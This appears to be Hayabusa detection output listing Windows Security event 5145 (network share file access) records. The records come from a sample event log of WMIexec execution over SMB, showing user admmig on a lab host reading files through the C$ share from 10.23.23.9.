10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W57798b05#\a9ccbdffc3a6a0fca980872c1531aa02 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W73044bb5#\ca9e965c5eab4b76dc40c510a6a4a916 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.050 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W193497eb#\2ebfdca668bed840047e6bcbeec44e53 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W08054466#\728711ada9b68483d998f34ac723c295 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.064 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad38fd8b#\9158e541821e2b6d43c32648464e77c2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.079 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wad78daf4#\81b597084cf1f78a1957cf8138744f32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.096 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.099 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Wb2d030b7# : IP Address: 
